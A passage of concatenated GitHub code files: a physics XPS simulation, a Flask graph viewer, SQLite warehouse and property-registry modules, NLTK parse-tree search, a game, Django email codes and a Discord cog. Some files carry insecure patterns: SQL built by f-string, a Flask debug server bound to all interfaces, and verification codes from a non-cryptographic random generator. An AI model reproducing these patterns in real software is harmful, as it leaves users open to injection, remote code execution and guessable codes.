v, w, hole, excit):\n \"\"\"Determinant of a projection of the final state over the initial: ne = number of electrons in the conduction band\n hole = hole state below Fermi's level / excit 
= particle state above Fermi's level / k = scattering potential\"\"\"\n nfermi = int((n + 1) / 2)\n mel = np.zeros((nfermi, nfermi))\n evali, eveci__, adm_eneri_ = dig_ham_imp(n, 0, d, v, w)\n evalf, evecf__, adm_enerf_ = dig_ham_imp(n, k, d, v, w)\n for bra in range(n):\n for ket in range(nfermi):\n if bra == hole:\n mel[bra][ket] = np.dot(evecf__[excit], eveci__[ket])\n if bra < nfermi and bra != hole:\n mel[bra][ket] = np.dot(evecf__[bra], eveci__[ket])\n ener_excit = evalf[excit] - evalf[hole]\n return ener_excit, np.power(la.det(mel), 2)\n\n\ndef spectrum_imp(ni, nf, k, d, v, w, head):\n \"\"\"\"compute xps rates for a logarithmic sequence of energies of a fixed head\"\"\"\n n_erg: int = int((nf - ni) / 2)\n erg_imp_ = np.zeros((n_erg))\n rate_imp_ = np.zeros_like(erg_imp_)\n\n count = 0\n for n in range(ni, nf, 2):\n nfermi = int((n + 1) / 2)\n n_hole = nfermi - head\n n_excit = nfermi + head - 1\n erg_imp_[count], rate_imp_[count] = xps_proj_imp(n, k, d, v, w, n_hole, n_excit)\n count += 1\n return erg_imp_, rate_imp_\n\n\ndef xps_proj_imp_binary(n, k, d, v, w, head):\n \"\"\"compute all the xps ray (primary and secondary) for states in binary form\"\"\"\n m__ = binarystates(n, head)\n evali, eveci__, adm_eneri_ = dig_ham_imp(n, 0, d, v, w)\n evalf, evecf__, adm_enerf_ = dig_ham_imp(n, k, d, v, w)\n nfermi = int((n + 1) / 2)\n rate_imp_ = np.zeros(len(m__)-1)\n erg_imp_ = np.zeros(len(m__)-1)\n for state in range(1, len(m__)):\n mel = np.zeros((nfermi, nfermi))\n sum_hole = 0\n sum_excit = 0\n for bra in range(nfermi):\n for ket in range(nfermi):\n mel[bra][ket] = np.dot(evecf__[int(m__[state][bra])], eveci__[int(m__[0][ket])])\n ener_hole = evalf[int(m__[0][bra])]\n ener_excit = evalf[int(m__[state][bra])]\n sum_hole += ener_hole\n sum_excit += ener_excit\n erg_imp_[state-1] = sum_excit - sum_hole\n rate_imp_[state-1] = np.power(la.det(mel), 2)\n return erg_imp_, rate_imp_\n\n\ndef binary_convolution_imp(ni, nf, k, d, v, w, head):\n \"\"\"compute all the xps ray for states in binary form with a convolution box function\"\"\"\n erg_, rate_ = spectrum_imp(ni, nf, k, d, v, w, head)\n rate_conv_ = np.zeros(len(erg_) - 2)\n erg_conv_ = np.zeros_like(rate_conv_)\n for n in range(ni, nf-4, 2):\n ergs_, rates_ = xps_proj_imp_binary(n, k, d, v, w, head)\n for i in range(len(erg_) - 2):\n for j in range(len(ergs_) - 2):\n if np.sqrt(erg_[i + 1] * erg_[i + 2]) < ergs_[j] < np.sqrt(erg_[i] * erg_[i + 1]):\n rate_conv_[i] += rates_[j]\n erg_conv_[i] = erg_[i+1]\n return erg_conv_, rate_conv_\n\n\ndef inside(ni, nf, k, d, v, head):\n es = []\n ws = []\n eps = []\n erg_, rate_ = spectrum_imp(ni, nf, k, d, v, 2, head)\n dw = 1 / np.power(10, 7)\n iw = int_w() + dw\n for i in range(len(int_epsilon())):\n for p in range(len(int_w()) - 1):\n for j in range(len(erg_)):\n if (spectrum_imp(ni, nf, k, d, v, int_w()[p], head)[0][j] - int_epsilon()[i]) * (\n spectrum_imp(ni, nf, k, d, v, int_w()[p + 1], head)[0][j]\n - int_epsilon()[i]) < 0:\n es.append(j)\n ws.append(p)\n eps.append(int_epsilon()[i])\n erg_w_ = np.zeros(len(es))\n rate_w_ = np.zeros(len(es))\n for i in range(len(es)):\n erg_w_[i] = eps[i]\n rate_w_[i] = spectrum_imp(ni, nf, k, d, v, int_w()[ws[i]], head)[1][es[i]]\n return erg_w_, rate_w_\n","repo_name":"Marinopl/Projetos-Pessoais","sub_path":"XPS.py","file_name":"XPS.py","file_ext":"py","file_size_in_byte":11715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35564241416","text":"from flask import Flask, render_template\nfrom 
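# --- Hedged numerical note on the XPS rates above: each rate is
# |det(M)|**2 via np.power(la.det(mel), 2); for larger matrices that
# determinant can under- or overflow, and numpy's slogdet yields the same
# quantity in a safer logarithmic form (det_squared is our name):
import numpy as np
from numpy import linalg as la

def det_squared(m):
    sign, logabsdet = la.slogdet(m)
    return 0.0 if sign == 0 else float(np.exp(2.0 * logabsdet))

assert abs(det_squared(np.eye(3) * 2.0) - 64.0) < 1e-9   # det 8 -> squared 64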
src.redraw_graph_html import redraw_graph_html\nfrom src.query_database import query_database\n\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef redraw_node_graph():\n nodes, edges = query_database()\n redraw_graph_html(nodes, edges)\n return render_template(\"nx.html\")\n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", debug=True)\n","repo_name":"LyndinK/dependencyVizualizer","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18757681003","text":"import sqlite3 as sl\nimport abc\nimport copy\nimport datetime\nfrom typing import List\nfrom datetime import datetime\n\n\n# Абстрактный класс наблюдателя, от него наследуется тот класс, который будет следить за датой\nclass IObserver(metaclass=abc.ABCMeta):\n @abc.abstractmethod\n def update(self, date: str, id, ):\n pass\n\n\n# Абстрактный класс наблюдаемого, от него будет наследоваться класс Cargo.\n# также необходимо будет переопределить методы этого класса в классе Cargo (пример на классе Date ниже)\nclass IObservable(metaclass=abc.ABCMeta):\n @abc.abstractmethod\n def add_observer(self, o: IObserver):\n pass\n\n @abc.abstractmethod\n def remove_observer(self, o: IObserver):\n pass\n\n @abc.abstractmethod\n def notify(self):\n pass\n\nclass dateListener(IObserver):\n def __init__(self, obj: IObservable):\n self.__date = obj\n obj.add_observer(self)\n\n def update(self, date_: str, id):\n if str(date_) <= datetime.today().strftime(\"%Y-%m-%d\"):\n print('some shit is happened', id)\n take_from_table(con)\n send_to_logs(id)\n self.__date.remove_observer(self)\n\n#def\n\n# Класс грузов:\nclass Cargo(IObservable):\n def __init__(self,\n cargo_id: int,\n name: str,\n amount: int,\n provider: str,\n recipient: str,\n date_of_receiving: str,\n departure_date: str,\n location_building: str,\n location_shelf: int,\n location_row: int,\n min_humidity: int,\n max_humidity: int):\n self.cargo_id = cargo_id\n self.name = name\n self.amount = amount\n self.provider = provider\n self.recipient = recipient\n self.date_of_receiving = date_of_receiving\n self.departure_date = departure_date\n self.location_building = location_building\n self.location_shelf = location_shelf\n self.location_row = location_row\n self.min_humidity = min_humidity\n self.max_humidity = max_humidity\n self.observers: List[IObserver] = []\n\n def clone(self):\n return copy.copy(self)\n\n def coming_date(self):\n self.notify()\n\n def add_observer(self, o: IObserver):\n self.observers.append(o)\n\n def remove_observer(self, o: IObserver):\n self.observers.remove(o)\n\n def notify(self):\n for o in self.observers:\n o.update(self.departure_date, self.cargo_id)\n\n def __del__(self):\n return 0\n\n\n# Прототип груза:\nprototype_cargo = Cargo(0, \"\", 0, \"\", \"\", \"\", \"\", \"\", 0, 0, 0, 0)\n\n\n\n# Функция создания груза через копирование прототипа:\ndef create_cargo_no_id(name: str,\n amount: int,\n provider: str,\n recipient: str,\n date_of_receiving: str,\n departure_date: str,\n location_building: str,\n location_shelf: int,\n location_row: int,\n min_humidity: int,\n max_humidity: int) -> Cargo:\n # Создание нового груза через копирование прототипа:\n cargo = Cargo.clone(prototype_cargo)\n\n # Назначение переменных-элементов груза:\n cargo.name = name\n cargo.amount = amount\n cargo.provider = provider\n cargo.recipient = recipient\n cargo.date_of_receiving = date_of_receiving\n cargo.departure_date = departure_date\n 
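# --- Hedged caveat on the prototype pattern above: Cargo.clone() is
# copy.copy(), a *shallow* copy, so every cargo cloned from prototype_cargo
# shares one and the same observers list object. If clones need independent
# subscriber lists, clone() could reset the attribute:
#
#     def clone(self):
#         new = copy.copy(self)
#         new.observers = []   # per-clone subscriber list
#         return new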
cargo.location_building = location_building\n cargo.location_shelf = location_shelf\n cargo.location_row = location_row\n cargo.min_humidity = min_humidity\n cargo.max_humidity = max_humidity\n\n return cargo\n\n\ncon = sl.connect('cargo.db')\ncon2 = sl.connect('logcargo.db')\n\n\ndef create_table(con_in):\n with con_in:\n con_in.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS CARGOS (\n id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,\n name TEXT,\n amount INTEGER,\n provider TEXT,\n recipient TEXT,\n date_of_receiving DATE,\n departure_date DATE,\n location_building TEXT,\n location_shelf INTEGER,\n location_row INTEGER, \n min_humidity INTEGER CHECK (min_humidity>=0 and min_humidity<=100),\n max_humidity INTEGER CHECK (max_humidity>=0 and max_humidity<=100) \n );\n \"\"\")\n\n\ndef insert_in_table(cargo: Cargo):\n cargo_id = 0\n data = con.execute(\"SELECT EXISTS (SELECT 1 FROM CARGOS)\")\n for row in data:\n if row[0] != 0:\n data2 = con.execute(\"SELECT * FROM CARGOS ORDER BY id DESC LIMIT 1\")\n for row2 in data2:\n cargo_id = row2[0] + 1\n else:\n cargo_id = 1\n\n sql = 'INSERT INTO CARGOS (id, name, amount, provider, recipient, date_of_receiving, departure_date, ' \\\n 'location_building, location_shelf, location_row, min_humidity, max_humidity) values(?, ?, ?, ?, ?, ?, ?, ?, ' \\\n '?, ?, ?, ?)'\n if cargo_id != 0:\n data = [(cargo_id,\n cargo.name,\n cargo.amount,\n cargo.provider,\n cargo.recipient,\n cargo.date_of_receiving,\n cargo.departure_date,\n cargo.location_building,\n cargo.location_shelf,\n cargo.location_row,\n cargo.min_humidity,\n cargo.max_humidity)]\n with con:\n con.executemany(sql, data)\n del cargo\n\n\ndef take_from_table(choose_con):\n cargos_list = []\n with choose_con:\n data = choose_con.execute(\"SELECT * FROM CARGOS\")\n lst = data.fetchall()\n for j in range(0, len(lst)):\n cargo_entity = Cargo.clone(prototype_cargo)\n cargo_entity.cargo_id = lst[j][0]\n cargo_entity.name = lst[j][1]\n cargo_entity.amount = lst[j][2]\n cargo_entity.provider = lst[j][3]\n cargo_entity.recipient = lst[j][4]\n cargo_entity.date_of_receiving = lst[j][5]\n cargo_entity.departure_date = lst[j][6]\n cargo_entity.location_building = lst[j][7]\n cargo_entity.location_shelf = lst[j][8]\n cargo_entity.location_row = lst[j][9]\n cargo_entity.min_humidity = lst[j][10]\n cargo_entity.max_humidity = lst[j][11]\n cargos_list.append(cargo_entity)\n\n return cargos_list\n\n\ndef send_to_logs(sent_id: int):\n global glob_id\n #f\"SELECT EXISTS (SELECT * FROM CARGOS WHERE id = {sent_id})\"\n with con:\n data = con.execute(f\"SELECT * FROM CARGOS WHERE id = {sent_id}\")\n print(con.execute(f\"SELECT * FROM CARGOS WHERE id = {sent_id}\"))\n cargo_to_send = data.fetchone()\n\n data = con.execute(f\"SELECT EXISTS (SELECT * FROM CARGOS WHERE id = {sent_id})\")\n con.execute(f\"DELETE FROM CARGOS WHERE id = {sent_id}\")\n\n for row in data:\n print(row)\n if row[0] != 0:\n sql = 'INSERT OR IGNORE INTO CARGOS (id, name, amount, provider, recipient, date_of_receiving, departure_date, ' \\\n 'location_building, location_shelf, location_row, min_humidity, max_humidity) values(?, ?, ?, ?, ?, ?, ?, ?, ' \\\n '?, ?, ?, ?)'\n data = [(glob_id,\n cargo_to_send[1],\n cargo_to_send[2],\n cargo_to_send[3],\n cargo_to_send[4],\n cargo_to_send[5],\n cargo_to_send[6],\n cargo_to_send[7],\n cargo_to_send[8],\n cargo_to_send[9],\n cargo_to_send[10],\n cargo_to_send[11])]\n with con2:\n con2.executemany(sql, data)\n glob_id += 1\n\n\nCrg = create_cargo_no_id('Шины Michelin X-Ice North 4 SUV 225/65 R17', 4, 'Michelin 
SCA', 'ИП Подъёмник', '2022-10-15', '2022-12-20', 'storage1',\n 2, 1, 10, 60)\nCrg1 = create_cargo_no_id('Крыло правое переднее Nissan 350z', 1, 'ОАО Бокс-кит', 'ЗАО Автострой', '2022-9-15', '2023-1-13', 'storage1',\n 2, 2, 20, 50)\nCrg2 = create_cargo_no_id('Привод передний ВАЗ-2107', 4, 'АО АвтоВАЗ', 'ИП Подъёмник', '2022-7-15', '2022-10-11', 'storage2',\n 3, 4, 10, 100)\n\n\n\nglob_id = 1\ncreate_table(con)\ncreate_table(con2)\n# insert_in_table(Crg)\n# insert_in_table(Crg1)\n# insert_in_table(Crg2)\n","repo_name":"RusJ-KH/Warehouse","sub_path":"dbinterface.py","file_name":"dbinterface.py","file_ext":"py","file_size_in_byte":8972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"290615804","text":"#encoding=utf8\r\nimport nltk.tree as tree\r\nimport nltk\r\n\r\ndef get_vn_pair():\r\n pass\r\ndef get_noun_chunk(tree):\r\n noun_chunk=[]\r\n if tree.label()==\"NP\":\r\n nouns_phase=''.join(tree.leaves())\r\n noun_chunk.append(nouns_phase) \r\n return noun_chunk\r\n\r\ndef get_ip_recursion_noun(tree):\r\n np_list=[]\r\n if len(tree)==1:\r\n tr=tree[0]\r\n get_ip_recursion_noun(tr)\r\n if len(tree)==2:\r\n tr=tree[0]\r\n get_ip_recursion_noun(tr) \r\n tr=tree[1]\r\n get_ip_recursion_noun(tr) \r\n if len(tree)==3:\r\n tr=tree[0]\r\n get_ip_recursion_noun(tr) \r\n tr=tree[1]\r\n get_ip_recursion_noun(tr) \r\n tr=tree[2]\r\n get_ip_recursion_noun(tr) \r\n if tree.label()=='NP':\r\n np_list.append(get_noun_chunk(tree))\r\n return np_list\r\n\r\n\r\n\r\ndef get_vv_loss_np(tree):\r\n if not isinstance(tree,nltk.tree.Tree):\r\n return False\r\n stack=[]\r\n np=[]\r\n stack.append(tree)\r\n current_tree=''\r\n while stack:\r\n current_tree=stack.pop()\r\n if isinstance(current_tree,nltk.tree.Tree) and current_tree.label()=='VP':\r\n continue \r\n elif isinstance(current_tree,nltk.tree.Tree) and current_tree.label()!='NP':\r\n for i in range(len(current_tree)): \r\n stack.append(current_tree[i])\r\n elif isinstance(current_tree,nltk.tree.Tree) and current_tree.label()=='NP':\r\n np.append(get_noun_chunk(tree))\r\n if np:\r\n return np\r\n else:\r\n return False\r\n \r\ndef search(tree_in): # 遍历刚才构建的树\r\n if not isinstance(tree_in,nltk.tree.Tree):\r\n return False \r\n vp_pair=[] \r\n stack=[]\r\n stack.append(tree_in)\r\n current_tree=''\r\n while stack:\r\n tree=stack.pop()\r\n if isinstance(tree,nltk.tree.Tree) and tree.label()==\"ROOT\": # 要处理的文本的语句\r\n for i in range(len(tree)):\r\n stack.append(tree[i])\t \r\n if isinstance(tree,nltk.tree.Tree) and tree.label()==\"IP\": # 简单从句\r\n for i in range(len(tree)):\r\n stack.append(tree[i])\t \r\n if isinstance(tree,nltk.tree.Tree) and tree.label()==\"VP\": # 动词短语\r\n duplicate=[]\r\n if len(tree)>=2:\r\n for i in range(1,len(tree)):\r\n if tree[0].label()=='VV' and tree[i].label()==\"NP\": # 动词 和 名词短语\r\n verb=''.join(tree[0].leaves()) # 合并动词 leaves是分词\r\n noun=get_noun_chunk(tree[i])\r\n if verb and noun:\r\n vp_pair.append((verb,noun)) # 返回 动名词短语对\r\n duplicate.append(noun)\r\n elif tree[0].label()=='VV' and tree[i].label()!=\"NP\":\r\n noun=get_vv_loss_np(tree)\r\n verb=''.join(tree[0].leaves())\r\n if verb and noun and noun not in duplicate:\r\n duplicate.append(noun)\r\n vp_pair.append((verb,noun))\r\n if vp_pair:\r\n return vp_pair\r\n else:\r\n return False \r\n\r\n\r\n #if tree.label()==\"NP\":\r\n #nouns_phase=''.join(tree.leaves())\r\n #noun_chunk.append(nouns_phase) 
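# --- Hedged usage sketch for search() above, on a toy Chinese constituency
# parse carrying the labels it matches (ROOT/IP/VP/VV/NP); the sentence is
# ours, purely illustrative:
from nltk.tree import Tree

_t = Tree.fromstring("(ROOT (IP (NP (NN 我们)) (VP (VV 吃) (NP (NN 苹果)))))")
assert search(_t) == [('吃', ['苹果'])]   # one verb-object pair extracted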
\r\n","repo_name":"JackKuo666/NLP_basis","sub_path":"4_chapter/4.2依存句法树解析/recursionSearch.py","file_name":"recursionSearch.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"en","doc_type":"code","stars":412,"dataset":"github-code","pt":"61"} +{"seq_id":"9346393204","text":"import random\r\nfile = open('rating.txt', 'r') # Reading the file named (rating.txt)\r\n# for converting the lines in the file to list (the name of the list is \"full_list\")\r\nlist_on_file = file.readlines()\r\nfull_list = []\r\nfor i in list_on_file:\r\n i.rstrip()\r\n a = i.split()\r\n for x in a:\r\n full_list.append(x)\r\nname = str(input('Enter your name:')) # entering the name of the user.\r\nprint('Hello,', name)\r\n# calculate the rating for users.\r\nif name in full_list:\r\n rating = int(full_list[full_list.index(name) + 1])\r\nelse:\r\n rating = 0\r\nadditional_inputs = input().split(',') # this list of the words which allowable for the user to select from.\r\nif len(additional_inputs) == 1 and additional_inputs[0] == '':\r\n print(\"Okay, let's start\")\r\n while True:\r\n allowable_inputs = ['rock', 'scissors', 'paper'] # The main list of words which allowable for the user to select from.\r\n user_input = input() # entering the user selection.\r\n computer_input = random.choice(allowable_inputs) # computer random selection.\r\n\r\n if user_input in allowable_inputs or user_input == '!exit' or user_input == '!rating':\r\n if user_input == '!rating':\r\n print('Your rating:', rating)\r\n \r\n if user_input in allowable_inputs or user_input == '!exit':\r\n game_dict_winning = {'paper': 'rock', 'scissors': 'paper', 'rock': 'scissors'}\r\n if game_dict_winning[computer_input] == user_input:\r\n print(\"Sorry, but computer chose {0}\".format(computer_input))\r\n elif computer_input == user_input:\r\n rating += 50 # in case of draw the rating of user increase (50)\r\n print(\"There is a draw ({0})\".format(user_input))\r\n elif user_input == '!exit':\r\n print('Bye!')\r\n break\r\n else: \r\n rating += 100 # in case of win the rating of user increase (100)\r\n print(\"Well done. Computer chose {0} and failed\".format(computer_input))\r\n else:\r\n print('Invalid input')\r\nelse:\r\n print(\"Okay, let's start\")\r\n while True:\r\n user_input = input() # entering the user selection.\r\n computer_input = random.choice(additional_inputs) # computer random selection.\r\n if user_input in additional_inputs or user_input == '!exit' or user_input == '!rating':\r\n if user_input == '!rating':\r\n print('Your rating:', rating)\r\n elif user_input in additional_inputs:\r\n elemnts_after_user_selection = additional_inputs[int(additional_inputs.index(user_input) + 1):int(len(additional_inputs))]\r\n elemnts_before_user_selection = additional_inputs[0:int(additional_inputs.index(user_input))]\r\n elemnts_after_user_selection.extend(elemnts_before_user_selection)\r\n computer_wins_list = elemnts_after_user_selection[0:int(len(elemnts_after_user_selection) / 2)]\r\n if computer_input in computer_wins_list:\r\n print(\"Sorry, but computer chose {0}\".format(computer_input))\r\n elif computer_input == user_input:\r\n rating += 50 # in case of draw the rating of user increase (50)\r\n print(\"There is a draw ({0})\".format(user_input))\r\n else:\r\n rating += 100 # in case of win the rating of user increase (100)\r\n print(\"Well done. 
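# --- Hedged distillation of the generalised winner rule above: with an odd
# number of moves arranged in a cycle, the half of the cycle immediately
# after the player's choice is exactly the set of computer moves that beat
# the player (computer_beats is our name for the check):
def computer_beats(moves, player, computer):
    i = moves.index(player)
    cycle = moves[i + 1:] + moves[:i]       # the cycle, starting after player
    return computer in cycle[: len(cycle) // 2]

assert computer_beats(["rock", "paper", "scissors"], "rock", "paper")
assert not computer_beats(["rock", "paper", "scissors"], "rock", "scissors")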
Computer chose {0} and failed\".format(computer_input))\r\n elif user_input == '!exit':\r\n print('Bye!')\r\n break\r\n else:\r\n print('Invalid input')","repo_name":"MahmoudAbdulla1988/Rock-Paper-Scissors-game","sub_path":"Rock-Paper-Scissors-game.py","file_name":"Rock-Paper-Scissors-game.py","file_ext":"py","file_size_in_byte":3762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5008456163","text":"# encoding:utf-8\nfrom random import Random\n\nfrom django.core.mail import send_mail\nfrom users.models import EmailVerifyRecord\nfrom MxOnline.settings import EMAIL_FROM\n\n\ndef send_link_email(email, send_type='register'):\n record = EmailVerifyRecord()\n record.email = email\n record.send_type = send_type\n if send_type == 'modify':\n record.code = generate_code(4)\n else:\n record.code = generate_code(16)\n record.save()\n if send_type == 'register':\n email_title = '慕学网注册链接'\n email_body = '慕学网注册激活链接:http://127.0.0.1/activate/{0}'.format(record.code)\n send_status = send_mail(email_title, email_body, EMAIL_FROM, [email])\n return send_status\n if send_type == 'reset':\n email_title = '慕学网找回密码链接'\n email_body = '慕学网找回密码链接:http://127.0.0.1/reset/{0}'.format(record.code)\n send_status = send_mail(email_title, email_body, EMAIL_FROM, [email])\n return send_status\n if send_type == 'modify':\n email_title = '慕学网更换邮箱验证码'\n email_body = '验证码:{0} '.format(record.code)\n send_status = send_mail(email_title, email_body, EMAIL_FROM, [email])\n return send_status\n\n\ndef generate_code(code_length=4):\n code = ''\n codes = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789'\n code_range = len(codes) - 1\n rand = Random()\n for i in range(code_length):\n code += codes[rand.randint(0, code_range)]\n return code\n","repo_name":"daigocy/mxonline","sub_path":"apps/utils/email_send.py","file_name":"email_send.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30687260727","text":"import uuid\nimport hashlib\n\nfrom .models import *\nfrom django.apps import apps\nfrom django.contrib.auth.models import User\nfrom datetime import date\n\nSALT = \"SALT\"\n\n\nclass PostgresManage:\n def create_notary(self, notary):\n # notary is dict with such keys:\n # * full_name\n # * license\n # * login\n # * pwd\n user = User.objects.create_user(username=notary['login'], password=notary['pwd'])\n notary = Notary(id=user, full_name=notary['full_name'], licensed=False, license=notary['license'])\n notary.save()\n return notary\n\n def create_encumbrance(self, encumbrance, ob, reason_doc):\n # encumbrance\n d_string = encumbrance['date'].split(\"-\")\n d_string = [int(ds) for ds in d_string]\n d = date(d_string[0], d_string[1], d_string[2])\n d_string = encumbrance['deadline'].split(\"-\")\n d_string = [int(ds) for ds in d_string]\n dd = date(d_string[0], d_string[1], d_string[2])\n prosecutor = self.read_prosecutors(encumbrance['prosecutor_id'])\n debtor = self.read_debtors(encumbrance['debtor_id'])\n\n reason_document_date_string = reason_doc['date'].split(\"-\")\n reason_document_date_string = [int(rdds) for rdds in reason_document_date_string]\n reason_document_date = date(reason_document_date_string[0], reason_document_date_string[1], reason_document_date_string[2])\n reason_document = ReasonDocument(name=reason_doc['name'], description=reason_doc['description'],\n date=reason_document_date)\n reason_document.save()\n\n obj = 
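# --- Hedged security note on generate_code in email_send above: it draws
# from random.Random, which is deterministic and unsuited to tokens that
# gate account activation or password resets; the stdlib secrets module is
# the usual replacement (generate_code_secure is our name):
import secrets
import string

def generate_code_secure(length=16):
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))

assert len(generate_code_secure()) == 16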
Object(serial_number=ob['serial_number'], description=ob['description'])\n obj.save()\n\n notary = self.read_notaries(encumbrance['notary_id'])\n enc = Encumbrance(date=d, prosecutor_id=prosecutor,\n debtor_id=debtor, notary_id=notary,\n reason_document=reason_document, encumbrance_kind=encumbrance['encumbrance_kind'],\n encumbrance_type=encumbrance['encumbrance_type'], debt_amount=encumbrance['debt_amount'],\n deadline=dd, object_id=obj, checked=False, hashcode=\"\",)\n enc.save()\n enc_id = enc.id\n enc.hashcode = hashlib.sha256(SALT.encode() + str(enc_id).encode()).hexdigest()\n enc.save()\n return enc_id\n\n def read_encumbrances(self, query=None, detailed_info=False):\n if query:\n try:\n query = int(query)\n except:\n pass\n\n if isinstance(query, int):\n if query > 0 and detailed_info:\n enc = Encumbrance.objects.filter(id=query).values()\n enc = enc[0]\n prosecutor = enc['prosecutor_id_id']\n prosecutor = self.read_prosecutors(prosecutor)\n prosecutor_addr = prosecutor.address_id\n debtor = enc['debtor_id_id']\n debtor = self.read_debtors(debtor)\n debtor_addr = debtor.address_id\n notary = enc['notary_id_id']\n notary = self.read_notaries(notary)\n reason_document = enc['reason_document_id']\n reason_document = self.read_reason_documents(reason_document)\n obj = enc['object_id_id']\n obj = self.read_objects(obj)\n if enc['checked']:\n return {\n \"encumbrance\": enc,\n \"prosecutor\": prosecutor,\n \"prosecutor_addr\": prosecutor_addr,\n \"debtor\": debtor,\n \"debtor_addr\": debtor_addr,\n \"notary\": notary,\n \"reason_document\": reason_document,\n \"object\": obj,\n }\n else:\n return None\n elif query > 0 and not detailed_info:\n return Encumbrance.objects.filter(id=query).values()\n else:\n return None\n elif not detailed_info:\n return Encumbrance.objects.filter(encumbrance_type=query).values()\n else:\n return None\n elif not detailed_info:\n return Encumbrance.objects.values('id', 'encumbrance_type', 'encumbrance_kind',\n 'date', 'notary_id__full_name')\n else:\n return None\n\n def read_prosecutors(self, id=None):\n if id:\n return Prosecutor.objects.get(id=id)\n else:\n return Prosecutor.objects.values('id', 'code')\n\n def read_debtors(self, id=None):\n if id:\n return Debtor.objects.get(id=id)\n else:\n return Debtor.objects.values('id', 'code')\n\n def read_reason_documents(self, id=None):\n if id:\n return ReasonDocument.objects.get(id=id)\n else:\n return ReasonDocument.objects.values('id', 'name')\n\n def read_objects(self, id=None):\n if id:\n return Object.objects.get(id=id)\n else:\n return Object.objects.values('id', 'serial_number')\n\n def read_notaries(self, id=None):\n if id:\n return Notary.objects.get(id_id=id)\n else:\n # TODO\n return None\n\n def read_addresses(self, id=None):\n if id:\n return Address.objects.get(id=id)\n else:\n # TODO\n return None\n\n def read_encumbrances_by_notary(self, notary_id):\n return Encumbrance.objects.filter(notary_id=notary_id).values()\n\n def read_encumbrance_for_modifying(self, enc_id):\n try:\n enc_id = int(enc_id)\n except:\n enc_id = -1\n return None\n if enc_id > 0:\n enc = Encumbrance.objects.filter(id=enc_id).values()\n return enc\n else:\n return None\n\n def modify_encumbrance(self, enc_id, new_values_enc, new_values_obj, new_values_rd):\n try:\n enc = Encumbrance.objects.filter(id=enc_id).get()\n except:\n return None\n\n # prosecutor\n prosecutor = self.read_prosecutors(new_values_enc['prosecutor_id'])\n enc.prosecutor_id = prosecutor\n\n # debtor\n debtor = self.read_debtors(new_values_enc['debtor_id'])\n 
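# --- Hedged simplification of the manual date handling in
# create_encumbrance above: each split/int/date dance over a "YYYY-MM-DD"
# string can be a single strptime call, which also rejects malformed input
# outright:
#
#     from datetime import datetime
#     d = datetime.strptime(encumbrance['date'], "%Y-%m-%d").date()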
enc.debtor_id = debtor\n\n # reason document\n enc.reason_document.name = new_values_rd['name']\n enc.reason_document.description = new_values_rd['description']\n enc.reason_document.save()\n\n enc.encumbrance_kind = new_values_enc['encumbrance_kind']\n enc.encumbrance_type = new_values_enc['encumbrance_type']\n enc.debt_amount = new_values_enc['debt_amount']\n enc.deadline = new_values_enc['deadline']\n\n # object\n enc.object_id.serial_number = new_values_obj['serial_number']\n enc.object_id.description = new_values_obj['description']\n enc.object_id.save()\n\n enc.save()\n\n def create_debtor(self, debt, addr):\n address = Address(index=addr['index'], city=addr['city'],\n country=addr['country'], street=addr['street'])\n address.save()\n\n debtor = Debtor(full_name=debt['full_name'], code=debt['code'],\n options=debt['options'], address_id=address)\n debtor.save()\n\n def create_prosecutor(self, pros, addr):\n address = Address(index=addr['index'], city=addr['city'],\n country=addr['country'], street=addr['street'])\n address.save()\n\n prosecutor = Prosecutor(full_name=pros['full_name'], code=pros['code'],\n options=pros['options'], address_id=address)\n prosecutor.save()\n","repo_name":"Tayum/SRMP","sub_path":"SRMP/property/postgres_manage.py","file_name":"postgres_manage.py","file_ext":"py","file_size_in_byte":7968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40996166425","text":"lista = []\npares = []\nimpares = []\ncontinuar = 's'\nwhile 'n' not in continuar:\n lista.append(int(input('Add a value: ')))\n continuar = str(input('continue [Y/N]: '))\nfor r in range(0, len(lista)):\n if lista[r] % 2 == 0:\n pares.append(lista[r])\n else:\n impares.append(lista[r])\nprint(f'List: {lista}')\nprint(f'Even: {pares}')\nprint(f'Odd: {impares}')\n","repo_name":"Lu1zReis/exercicios-Python","sub_path":"testes e exercícios/exercicios/script_082.py","file_name":"script_082.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41405713610","text":"import discord\nfrom discord.ext import commands\nfrom discord import app_commands\n\n\nclass GroupExample(commands.Cog):\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n class Group(app_commands.Group):\n \"\"\"Example of a group. This is also the command description, by the way.\"\"\"\n @app_commands.command(description=\"Add something\")\n async def add(self, interaction: discord.Interaction):\n await interaction.response.send_message(\"Something was added\")\n \n @app_commands.command(description=\"Remove something\")\n async def remove(self, interaction: discord.Interaction):\n await interaction.response.send_message(\"Something was removed\")\n \n self.bot.tree.add_command(Group()) # DO NOT FORGET THIS\n\n\nasync def setup(bot: commands.Bot):\n await bot.add_cog(GroupExample(bot))","repo_name":"MadCat9958/discord.pyCogs","sub_path":"cogs/group.py","file_name":"group.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"72017484354","text":"#-*- coding:utf-8 -*-\n\nfrom whitebox.orderer import Orderer, circuit_inputs\nfrom operator import xor\n\nclass MaskingScheme(object):\n NOT = OR = XOR = AND = ZERO = ONE = NotImplemented\n\n def __init__(self, rand, 